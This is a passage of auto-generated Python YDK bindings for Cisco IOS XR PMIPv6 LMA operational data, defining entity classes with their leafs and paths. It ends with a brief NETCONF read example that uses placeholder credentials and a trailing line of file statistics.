self._absolute_path = lambda: "Cisco-IOS-XR-ip-mobileip-oper:pmipv6/lma/config-variables/customer-variables/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Pmipv6.Lma.ConfigVariables.CustomerVariables.CustomerVariable, ['customer_name', 'cust_name', 'vrf_name', 'auth_option'], name, value)
class MllService(Entity):
"""
MLL service parameters
.. attribute:: ignore_hoa
Ignore Home Address
**type**\: bool
.. attribute:: mnp_ipv4_lmn_max
Max IPv4 prefixes per LMN
**type**\: int
**range:** 0..65535
.. attribute:: mnp_ipv6_lmn_max
Max IPv6 prefixes per LMN
**type**\: int
**range:** 0..65535
.. attribute:: mnp_lmn_max
Max prefixes per LMN
**type**\: int
**range:** 0..65535
.. attribute:: mnp_ipv4_cust_max
Max IPv4 prefixes per Customer
**type**\: int
**range:** 0..4294967295
.. attribute:: mnp_ipv6_cust_max
Max IPv6 prefixes per Customer
**type**\: int
**range:** 0..4294967295
.. attribute:: mnp_cust_max
Max prefixes per Customer
**type**\: int
**range:** 0..4294967295
.. attribute:: mnp_ipv4_cust_cur
Current IPv4 prefixes per Customer
**type**\: int
**range:** 0..4294967295
.. attribute:: mnp_ipv6_cust_cur
Current IPv6 prefixes per Customer
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'ip-mobileip-oper'
_revision = '2016-03-10'
def __init__(self):
super(Pmipv6.Lma.ConfigVariables.CustomerVariables.CustomerVariable.MllService, self).__init__()
self.yang_name = "mll-service"
self.yang_parent_name = "customer-variable"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('ignore_hoa', (YLeaf(YType.boolean, 'ignore-hoa'), ['bool'])),
('mnp_ipv4_lmn_max', (YLeaf(YType.uint16, 'mnp-ipv4-lmn-max'), ['int'])),
('mnp_ipv6_lmn_max', (YLeaf(YType.uint16, 'mnp-ipv6-lmn-max'), ['int'])),
('mnp_lmn_max', (YLeaf(YType.uint16, 'mnp-lmn-max'), ['int'])),
('mnp_ipv4_cust_max', (YLeaf(YType.uint32, 'mnp-ipv4-cust-max'), ['int'])),
('mnp_ipv6_cust_max', (YLeaf(YType.uint32, 'mnp-ipv6-cust-max'), ['int'])),
('mnp_cust_max', (YLeaf(YType.uint32, 'mnp-cust-max'), ['int'])),
('mnp_ipv4_cust_cur', (YLeaf(YType.uint32, 'mnp-ipv4-cust-cur'), ['int'])),
('mnp_ipv6_cust_cur', (YLeaf(YType.uint32, 'mnp-ipv6-cust-cur'), ['int'])),
])
self.ignore_hoa = None
self.mnp_ipv4_lmn_max = None
self.mnp_ipv6_lmn_max = None
self.mnp_lmn_max = None
self.mnp_ipv4_cust_max = None
self.mnp_ipv6_cust_max = None
self.mnp_cust_max = None
self.mnp_ipv4_cust_cur = None
self.mnp_ipv6_cust_cur = None
self._segment_path = lambda: "mll-service"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Pmipv6.Lma.ConfigVariables.CustomerVariables.CustomerVariable.MllService, ['ignore_hoa', 'mnp_ipv4_lmn_max', 'mnp_ipv6_lmn_max', 'mnp_lmn_max', 'mnp_ipv4_cust_max', 'mnp_ipv6_cust_max', 'mnp_cust_max', 'mnp_ipv4_cust_cur', 'mnp_ipv6_cust_cur'], name, value)
class GlobalVariables(Entity):
"""
Global Configuration Variables
.. attribute:: parameters
Domain Parameters
**type**\: :py:class:`Parameters <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6.Lma.ConfigVariables.GlobalVariables.Parameters>`
.. attribute:: mll_service
MLL service parameters
**type**\: :py:class:`MllService <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6.Lma.ConfigVariables.GlobalVariables.MllService>`
.. attribute:: domain
Domain Name
**type**\: str
.. attribute:: selfid
Self ID
**type**\: str
.. attribute:: apn_name
APN Name
**type**\: str
.. attribute:: role
Role Type
**type**\: :py:class:`Pmipv6Role <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6Role>`
.. attribute:: count
Number of Networks/Intf
**type**\: int
**range:** 0..4294967295
.. attribute:: peers
Number of Peers
**type**\: int
**range:** 0..4294967295
.. attribute:: customers
Number of Customers
**type**\: int
**range:** 0..4294967295
.. attribute:: num_network
Number of Networks
**type**\: int
**range:** 0..4294967295
.. attribute:: discover_mn
Discover MN Detachment
**type**\: bool
.. attribute:: local_routing
Local Routing
**type**\: bool
.. attribute:: aaa_accounting
AAA Accounting
**type**\: bool
.. attribute:: default_mn
Default MN Enabled
**type**\: bool
.. attribute:: apn
APN Present
**type**\: bool
.. attribute:: learn_mag
Learn MAG
**type**\: bool
.. attribute:: session_mgr
Session Manager
**type**\: bool
.. attribute:: service
Service
**type**\: int
**range:** 0..255
.. attribute:: profile
Default MN Profile Name
**type**\: str
.. attribute:: ddp
Discover Detach Period
**type**\: int
**range:** 0..4294967295
.. attribute:: ddt
Discover Detach Timeout
**type**\: int
**range:** 0..4294967295
.. attribute:: ddr
Discover Detach Retries
**type**\: int
**range:** 0..255
.. attribute:: intf
MAG Access List
**type**\: list of :py:class:`Intf <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6.Lma.ConfigVariables.GlobalVariables.Intf>`
.. attribute:: peer
Peer Parameters
**type**\: list of :py:class:`Peer <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6.Lma.ConfigVariables.GlobalVariables.Peer>`
.. attribute:: network
LMA Network Parameters
**type**\: list of :py:class:`Network <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6.Lma.ConfigVariables.GlobalVariables.Network>`
.. attribute:: cust
Customer parameters
**type**\: list of :py:class:`Cust <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6.Lma.ConfigVariables.GlobalVariables.Cust>`
"""
_prefix = 'ip-mobileip-oper'
_revision = '2016-03-10'
def __init__(self):
super(Pmipv6.Lma.ConfigVariables.GlobalVariables, self).__init__()
self.yang_name = "global-variables"
self.yang_parent_name = "config-variables"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("parameters", ("parameters", Pmipv6.Lma.ConfigVariables.GlobalVariables.Parameters)), ("mll-service", ("mll_service", Pmipv6.Lma.ConfigVariables.GlobalVariables.MllService)), ("intf", ("intf", Pmipv6.Lma.ConfigVariables.GlobalVariables.Intf)), ("peer", ("peer", Pmipv6.Lma.ConfigVariables.GlobalVariables.Peer)), ("network", ("network", Pmipv6.Lma.ConfigVariables.GlobalVariables.Network)), ("cust", ("cust", Pmipv6.Lma.ConfigVariables.GlobalVariables.Cust))])
self._leafs = OrderedDict([
('domain', (YLeaf(YType.str, 'domain'), ['str'])),
('selfid', (YLeaf(YType.str, 'selfid'), ['str'])),
('apn_name', (YLeaf(YType.str, 'apn-name'), ['str'])),
('role', (YLeaf(YType.enumeration, 'role'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper', 'Pmipv6Role', '')])),
('count', (YLeaf(YType.uint32, 'count'), ['int'])),
('peers', (YLeaf(YType.uint32, 'peers'), ['int'])),
('customers', (YLeaf(YType.uint32, 'customers'), ['int'])),
('num_network', (YLeaf(YType.uint32, 'num-network'), ['int'])),
('discover_mn', (YLeaf(YType.boolean, 'discover-mn'), ['bool'])),
('local_routing', (YLeaf(YType.boolean, 'local-routing'), ['bool'])),
('aaa_accounting', (YLeaf(YType.boolean, 'aaa-accounting'), ['bool'])),
('default_mn', (YLeaf(YType.boolean, 'default-mn'), ['bool'])),
('apn', (YLeaf(YType.boolean, 'apn'), ['bool'])),
('learn_mag', (YLeaf(YType.boolean, 'learn-mag'), ['bool'])),
('session_mgr', (YLeaf(YType.boolean, 'session-mgr'), ['bool'])),
('service', (YLeaf(YType.uint8, 'service'), ['int'])),
('profile', (YLeaf(YType.str, 'profile'), ['str'])),
('ddp', (YLeaf(YType.uint32, 'ddp'), ['int'])),
('ddt', (YLeaf(YType.uint32, 'ddt'), ['int'])),
('ddr', (YLeaf(YType.uint8, 'ddr'), ['int'])),
])
self.domain = None
self.selfid = None
self.apn_name = None
self.role = None
self.count = None
self.peers = None
self.customers = None
self.num_network = None
self.discover_mn = None
self.local_routing = None
self.aaa_accounting = None
self.default_mn = None
self.apn = None
self.learn_mag = None
self.session_mgr = None
self.service = None
self.profile = None
self.ddp = None
self.ddt = None
self.ddr = None
self.parameters = Pmipv6.Lma.ConfigVariables.GlobalVariables.Parameters()
self.parameters.parent = self
self._children_name_map["parameters"] = "parameters"
self.mll_service = Pmipv6.Lma.ConfigVariables.GlobalVariables.MllService()
self.mll_service.parent = self
self._children_name_map["mll_service"] = "mll-service"
self.intf = YList(self)
self.peer = YList(self)
self.network = YList(self)
self.cust = YList(self)
self._segment_path = lambda: "global-variables"
self._absolute_path = lambda: "Cisco-IOS-XR-ip-mobileip-oper:pmipv6/lma/config-variables/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Pmipv6.Lma.ConfigVariables.GlobalVariables, ['domain', 'selfid', 'apn_name', 'role', 'count', 'peers', 'customers', 'num_network', 'discover_mn', 'local_routing', 'aaa_accounting', 'default_mn', 'apn', 'learn_mag', 'session_mgr', 'service', 'profile', 'ddp', 'ddt', 'ddr'], name, value)
class Parameters(Entity):
"""
Domain Parameters
.. attribute:: self_id
Self Identifier
**type**\: :py:class:`SelfId <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6.Lma.ConfigVariables.GlobalVariables.Parameters.SelfId>`
.. attribute:: timestamp
Timestamp method in use
**type**\: bool
.. attribute:: window
Timestamp Validity Window
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: auth_option
Authentication Option
**type**\: bool
.. attribute:: reg_time
BCE Registration Lifetime
**type**\: int
**range:** 0..4294967295
.. attribute:: ref_time
BCE Refresh Time
**type**\: int
**range:** 0..4294967295
.. attribute:: retx
Refresh Retransmit Init
**type**\: int
**range:** 0..65535
.. attribute:: ret_max
Refresh Retransmit Max
**type**\: int
**range:** 0..65535
.. attribute:: bri_init
BRI Init Delay time
**type**\: int
**range:** 0..65535
.. attribute:: bri_retries
BRI Max Retries
**type**\: int
**range:** 0..65535
.. attribute:: bri_max
BRI Max Delay time
**type**\: int
**range:** 0..65535
.. attribute:: max_bindings
Allowed Max. Bindings
**type**\: int
**range:** 0..4294967295
.. attribute:: hnp
Allowed HNPs per MN Intf
**type**\: int
**range:** 0..255
.. attribute:: encap
Encapsulation Type
**type**\: :py:class:`Pmipv6Encap <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6Encap>`
.. attribute:: delete_time
BCE Delete Hold Timer
**type**\: int
**range:** 0..65535
.. attribute:: create_time
BCE Create Wait Timer
**type**\: int
**range:** 0..65535
.. attribute:: up_grekey
Upstream GRE Key
**type**\: int
**range:** 0..4294967295
.. attribute:: down_grekey
Downstream GRE Key
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'ip-mobileip-oper'
_revision = '2016-03-10'
def __init__(self):
super(Pmipv6.Lma.ConfigVariables.GlobalVariables.Parameters, self).__init__()
self.yang_name = "parameters"
self.yang_parent_name = "global-variables"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("self-id", ("self_id", Pmipv6.Lma.ConfigVariables.GlobalVariables.Parameters.SelfId))])
self._leafs = OrderedDict([
('timestamp', (YLeaf(YType.boolean, 'timestamp'), ['bool'])),
('window', (YLeaf(YType.uint64, 'window'), ['int'])),
('auth_option', (YLeaf(YType.boolean, 'auth-option'), ['bool'])),
('reg_time', (YLeaf(YType.uint32, 'reg-time'), ['int'])),
('ref_time', (YLeaf(YType.uint32, 'ref-time'), ['int'])),
('retx', (YLeaf(YType.uint16, 'retx'), ['int'])),
('ret_max', (YLeaf(YType.uint16, 'ret-max'), ['int'])),
('bri_init', (YLeaf(YType.uint16, 'bri-init'), ['int'])),
('bri_retries', (YLeaf(YType.uint16, 'bri-retries'), ['int'])),
('bri_max', (YLeaf(YType.uint16, 'bri-max'), ['int'])),
('max_bindings', (YLeaf(YType.uint32, 'max-bindings'), ['int'])),
('hnp', (YLeaf(YType.uint8, 'hnp'), ['int'])),
('encap', (YLeaf(YType.enumeration, 'encap'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper', 'Pmipv6Encap', '')])),
('delete_time', (YLeaf(YType.uint16, 'delete-time'), ['int'])),
('create_time', (YLeaf(YType.uint16, 'create-time'), ['int'])),
('up_grekey', (YLeaf(YType.uint32, 'up-grekey'), ['int'])),
('down_grekey', (YLeaf(YType.uint32, 'down-grekey'), ['int'])),
])
self.timestamp = None
self.window = None
self.auth_option = None
self.reg_time = None
self.ref_time = None
self.retx = None
self.ret_max = None
self.bri_init = None
self.bri_retries = None
self.bri_max = None
self.max_bindings = None
self.hnp = None
self.encap = None
self.delete_time = None
self.create_time = None
self.up_grekey = None
self.down_grekey = None
self.self_id = Pmipv6.Lma.ConfigVariables.GlobalVariables.Parameters.SelfId()
self.self_id.parent = self
self._children_name_map["self_id"] = "self-id"
self._segment_path = lambda: "parameters"
self._absolute_path = lambda: "Cisco-IOS-XR-ip-mobileip-oper:pmipv6/lma/config-variables/global-variables/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Pmipv6.Lma.ConfigVariables.GlobalVariables.Parameters, ['timestamp', 'window', 'auth_option', 'reg_time', 'ref_time', 'retx', 'ret_max', 'bri_init', 'bri_retries', 'bri_max', 'max_bindings', 'hnp', 'encap', 'delete_time', 'create_time', 'up_grekey', 'down_grekey'], name, value)
class SelfId(Entity):
"""
Self Identifier
.. attribute:: entity_
Identifier of PMIP Node
**type**\: str
.. attribute:: addr_type
IPV4 or IPV6 or Both
**type**\: :py:class:`Pmipv6Addr <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6Addr>`
.. attribute:: address
IPV6 address of LMA/MAG
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
.. attribute:: ipv4_address
IPV4 address of LMA/MAG
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
"""
_prefix = 'ip-mobileip-oper'
_revision = '2016-03-10'
def __init__(self):
super(Pmipv6.Lma.ConfigVariables.GlobalVariables.Parameters.SelfId, self).__init__()
self.yang_name = "self-id"
self.yang_parent_name = "parameters"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('entity_', (YLeaf(YType.str, 'entity'), ['str'])),
('addr_type', (YLeaf(YType.enumeration, 'addr-type'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper', 'Pmipv6Addr', '')])),
('address', (YLeaf(YType.str, 'address'), ['str'])),
('ipv4_address', (YLeaf(YType.str, 'ipv4-address'), ['str'])),
])
self.entity_ = None
self.addr_type = None
self.address = None
self.ipv4_address = None
self._segment_path = lambda: "self-id"
self._absolute_path = lambda: "Cisco-IOS-XR-ip-mobileip-oper:pmipv6/lma/config-variables/global-variables/parameters/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Pmipv6.Lma.ConfigVariables.GlobalVariables.Parameters.SelfId, ['entity_', 'addr_type', 'address', 'ipv4_address'], name, value)
class MllService(Entity):
"""
MLL service parameters
.. attribute:: ignore_hoa
Ignore Home Address
**type**\: bool
.. attribute:: mnp_ipv4_lmn_max
Max IPv4 prefixes per LMN
**type**\: int
**range:** 0..65535
.. attribute:: mnp_ipv6_lmn_max
Max IPv6 prefixes per LMN
**type**\: int
**range:** 0..65535
.. attribute:: mnp_lmn_max
Max prefixes per LMN
**type**\: int
**range:** 0..65535
.. attribute:: mnp_ipv4_cust_max
Max IPv4 prefixes per Customer
**type**\: int
**range:** 0..4294967295
.. attribute:: mnp_ipv6_cust_max
Max IPv6 prefixes per Customer
**type**\: int
**range:** 0..4294967295
.. attribute:: mnp_cust_max
Max prefixes per Customer
**type**\: int
**range:** 0..4294967295
.. attribute:: mnp_ipv4_cust_cur
Current IPv4 prefixes per Customer
**type**\: int
**range:** 0..4294967295
.. attribute:: mnp_ipv6_cust_cur
Current IPv6 prefixes per Customer
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'ip-mobileip-oper'
_revision = '2016-03-10'
def __init__(self):
super(Pmipv6.Lma.ConfigVariables.GlobalVariables.MllService, self).__init__()
self.yang_name = "mll-service"
self.yang_parent_name = "global-variables"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('ignore_hoa', (YLeaf(YType.boolean, 'ignore-hoa'), ['bool'])),
('mnp_ipv4_lmn_max', (YLeaf(YType.uint16, 'mnp-ipv4-lmn-max'), ['int'])),
('mnp_ipv6_lmn_max', (YLeaf(YType.uint16, 'mnp-ipv6-lmn-max'), ['int'])),
('mnp_lmn_max', (YLeaf(YType.uint16, 'mnp-lmn-max'), ['int'])),
('mnp_ipv4_cust_max', (YLeaf(YType.uint32, 'mnp-ipv4-cust-max'), ['int'])),
('mnp_ipv6_cust_max', (YLeaf(YType.uint32, 'mnp-ipv6-cust-max'), ['int'])),
('mnp_cust_max', (YLeaf(YType.uint32, 'mnp-cust-max'), ['int'])),
('mnp_ipv4_cust_cur', (YLeaf(YType.uint32, 'mnp-ipv4-cust-cur'), ['int'])),
('mnp_ipv6_cust_cur', (YLeaf(YType.uint32, 'mnp-ipv6-cust-cur'), ['int'])),
])
self.ignore_hoa = None
self.mnp_ipv4_lmn_max = None
self.mnp_ipv6_lmn_max = None
self.mnp_lmn_max = None
self.mnp_ipv4_cust_max = None
self.mnp_ipv6_cust_max = None
self.mnp_cust_max = None
self.mnp_ipv4_cust_cur = None
self.mnp_ipv6_cust_cur = None
self._segment_path = lambda: "mll-service"
self._absolute_path = lambda: "Cisco-IOS-XR-ip-mobileip-oper:pmipv6/lma/config-variables/global-variables/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Pmipv6.Lma.ConfigVariables.GlobalVariables.MllService, ['ignore_hoa', 'mnp_ipv4_lmn_max', 'mnp_ipv6_lmn_max', 'mnp_lmn_max', 'mnp_ipv4_cust_max', 'mnp_ipv6_cust_max', 'mnp_cust_max', 'mnp_ipv4_cust_cur', 'mnp_ipv6_cust_cur'], name, value)
class Intf(Entity):
"""
MAG Access List
.. attribute:: apn
APN Present
**type**\: bool
.. attribute:: interface
Access Interface Name
**type**\: str
.. attribute:: apn_name
APN Name
**type**\: str
"""
_prefix = 'ip-mobileip-oper'
_revision = '2016-03-10'
def __init__(self):
super(Pmipv6.Lma.ConfigVariables.GlobalVariables.Intf, self).__init__()
self.yang_name = "intf"
self.yang_parent_name = "global-variables"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('apn', (YLeaf(YType.boolean, 'apn'), ['bool'])),
('interface', (YLeaf(YType.str, 'interface'), ['str'])),
('apn_name', (YLeaf(YType.str, 'apn-name'), ['str'])),
])
self.apn = None
self.interface = None
self.apn_name = None
self._segment_path = lambda: "intf"
self._absolute_path = lambda: "Cisco-IOS-XR-ip-mobileip-oper:pmipv6/lma/config-variables/global-variables/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Pmipv6.Lma.ConfigVariables.GlobalVariables.Intf, ['apn', 'interface', 'apn_name'], name, value)
class Peer(Entity):
"""
Peer Parameters
.. attribute:: peer
Peer Name
**type**\: str
.. attribute:: vrf_name
VRF Name
**type**\: str
.. attribute:: interface
Peer static tunnel intf
**type**\: str
.. attribute:: encap
Encapsulation Type
**type**\: :py:class:`Pmipv6Encap <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6Encap>`
.. attribute:: auth
Authentication Option
**type**\: bool
.. attribute:: vrf
VRF Present
**type**\: bool
.. attribute:: statictunnel
Static tunnel Present
**type**\: bool
"""
_prefix = 'ip-mobileip-oper'
_revision = '2016-03-10'
def __init__(self):
super(Pmipv6.Lma.ConfigVariables.GlobalVariables.Peer, self).__init__()
self.yang_name = "peer"
self.yang_parent_name = "global-variables"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('peer', (YLeaf(YType.str, 'peer'), ['str'])),
('vrf_name', (YLeaf(YType.str, 'vrf-name'), ['str'])),
('interface', (YLeaf(YType.str, 'interface'), ['str'])),
('encap', (YLeaf(YType.enumeration, 'encap'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper', 'Pmipv6Encap', '')])),
('auth', (YLeaf(YType.boolean, 'auth'), ['bool'])),
('vrf', (YLeaf(YType.boolean, 'vrf'), ['bool'])),
('statictunnel', (YLeaf(YType.boolean, 'statictunnel'), ['bool'])),
])
self.peer = None
self.vrf_name = None
self.interface = None
self.encap = None
self.auth = None
self.vrf = None
self.statictunnel = None
self._segment_path = lambda: "peer"
self._absolute_path = lambda: "Cisco-IOS-XR-ip-mobileip-oper:pmipv6/lma/config-variables/global-variables/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Pmipv6.Lma.ConfigVariables.GlobalVariables.Peer, ['peer', 'vrf_name', 'interface', 'encap', 'auth', 'vrf', 'statictunnel'], name, value)
class Network(Entity):
"""
LMA Network Parameters
.. attribute:: v4pool
IPV4 pool Present
**type**\: bool
.. attribute:: v6pool
IPV6 pool Present
**type**\: bool
.. attribute:: network
Network Name
**type**\: str
.. attribute:: ipv4
IPv4 Address
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
.. attribute:: ipv6
IPv6 Address
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
.. attribute:: v4pfx_len
v4 prefix len
**type**\: int
**range:** 0..255
.. attribute:: v6pfx_len
v6 prefix len
**type**\: int
**range:** 0..255
.. attribute:: mrnet
num of mrnet
**type**\: int
**range:** 0..255
"""
_prefix = 'ip-mobileip-oper'
_revision = '2016-03-10'
def __init__(self):
super(Pmipv6.Lma.ConfigVariables.GlobalVariables.Network, self).__init__()
self.yang_name = "network"
self.yang_parent_name = "global-variables"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('v4pool', (YLeaf(YType.boolean, 'v4pool'), ['bool'])),
('v6pool', (YLeaf(YType.boolean, 'v6pool'), ['bool'])),
('network', (YLeaf(YType.str, 'network'), ['str'])),
('ipv4', (YLeaf(YType.str, 'ipv4'), ['str'])),
('ipv6', (YLeaf(YType.str, 'ipv6'), ['str'])),
('v4pfx_len', (YLeaf(YType.uint8, 'v4pfx-len'), ['int'])),
('v6pfx_len', (YLeaf(YType.uint8, 'v6pfx-len'), ['int'])),
('mrnet', (YLeaf(YType.uint8, 'mrnet'), ['int'])),
])
self.v4pool = None
self.v6pool = None
self.network = None
self.ipv4 = None
self.ipv6 = None
self.v4pfx_len = None
self.v6pfx_len = None
self.mrnet = None
self._segment_path = lambda: "network"
self._absolute_path = lambda: "Cisco-IOS-XR-ip-mobileip-oper:pmipv6/lma/config-variables/global-variables/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Pmipv6.Lma.ConfigVariables.GlobalVariables.Network, ['v4pool', 'v6pool', 'network', 'ipv4', 'ipv6', 'v4pfx_len', 'v6pfx_len', 'mrnet'], name, value)
class Cust(Entity):
"""
Customer parameters
.. attribute:: cust
Customer Present
**type**\: bool
.. attribute:: vrf
Customer VRF Present
**type**\: bool
.. attribute:: t_vrf
Transport VRF Present
**type**\: bool
.. attribute:: auth_option
Authentication Option
**type**\: bool
.. attribute:: heart_beat
HeartBeat Option
**type**\: bool
.. attribute:: reg_time
BCE Registration Lifetime
**type**\: int
**range:** 0..4294967295
.. attribute:: cust_name
CUSTOMER Name
**type**\: str
.. attribute:: vrf_name
VRF Name
**type**\: str
.. attribute:: t_vrf_name
Transport VRF Name
**type**\: str
"""
_prefix = 'ip-mobileip-oper'
_revision = '2016-03-10'
def __init__(self):
super(Pmipv6.Lma.ConfigVariables.GlobalVariables.Cust, self).__init__()
self.yang_name = "cust"
self.yang_parent_name = "global-variables"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('cust', (YLeaf(YType.boolean, 'cust'), ['bool'])),
('vrf', (YLeaf(YType.boolean, 'vrf'), ['bool'])),
('t_vrf', (YLeaf(YType.boolean, 't-vrf'), ['bool'])),
('auth_option', (YLeaf(YType.boolean, 'auth-option'), ['bool'])),
('heart_beat', (YLeaf(YType.boolean, 'heart-beat'), ['bool'])),
('reg_time', (YLeaf(YType.uint32, 'reg-time'), ['int'])),
('cust_name', (YLeaf(YType.str, 'cust-name'), ['str'])),
('vrf_name', (YLeaf(YType.str, 'vrf-name'), ['str'])),
('t_vrf_name', (YLeaf(YType.str, 't-vrf-name'), ['str'])),
])
self.cust = None
self.vrf = None
self.t_vrf = None
self.auth_option = None
self.heart_beat = None
self.reg_time = None
self.cust_name = None
self.vrf_name = None
self.t_vrf_name = None
self._segment_path = lambda: "cust"
self._absolute_path = lambda: "Cisco-IOS-XR-ip-mobileip-oper:pmipv6/lma/config-variables/global-variables/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Pmipv6.Lma.ConfigVariables.GlobalVariables.Cust, ['cust', 'vrf', 't_vrf', 'auth_option', 'heart_beat', 'reg_time', 'cust_name', 'vrf_name', 't_vrf_name'], name, value)
def clone_ptr(self):
self._top_entity = Pmipv6()
return self._top_entity
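# ---------------------------------------------------------------------------
# Usage sketch (not part of the generated bindings above): a minimal example of
# how the Pmipv6 operational classes in this module are typically read with the
# YDK CRUDService. It assumes a NETCONF-enabled IOS XR device that supports the
# Cisco-IOS-XR-ip-mobileip-oper model; the address and credentials below are
# placeholders, not values taken from this module.
# ---------------------------------------------------------------------------
if __name__ == "__main__":
    from ydk.services import CRUDService
    from ydk.providers import NetconfServiceProvider
    from ydk.models.cisco_ios_xr import Cisco_IOS_XR_ip_mobileip_oper as mobileip_oper

    # Open a NETCONF session to the router (placeholder address/credentials).
    provider = NetconfServiceProvider(address="192.0.2.1",
                                      port=830,
                                      username="admin",
                                      password="admin")

    # Read the operational subtree rooted at the top-level Pmipv6 class.
    crud = CRUDService()
    pmipv6 = crud.read(provider, mobileip_oper.Pmipv6())

    # Walk the LMA binding table (Pmipv6.Lma.Bindings.Binding above) and print
    # a few of its leafs.
    for binding in pmipv6.lma.bindings.binding:
        print(binding.mnnai, binding.mag_name, binding.hoa, binding.lifetime)

    # Heartbeat entries are keyed by peer-addr (Pmipv6.Lma.Heartbeats.Heartbeat).
    for hb in pmipv6.lma.heartbeats.heartbeat:
        print(hb.peer_addr, "up" if hb.status else "down")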
50.7622 | 984 | 0.421741 | 22,714 | 294,370 | 5.19182 | 0.020428 | 0.028628 | 0.033173 | 0.035937 | 0.882758 | 0.854308 | 0.831158 | 0.814784 | 0.806753 | 0.793567 | 0 | 0.041174 | 0.479064 | 294,370 | 5,798 | 985 | 50.770956 | 0.727841 | 0.235938 | 0 | 0.708682 | 0 | 0.012552 | 0.208969 | 0.110132 | 0 | 0 | 0 | 0 | 0 | 1 | 0.054916 | false | 0 | 0.002615 | 0 | 0.099372 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7
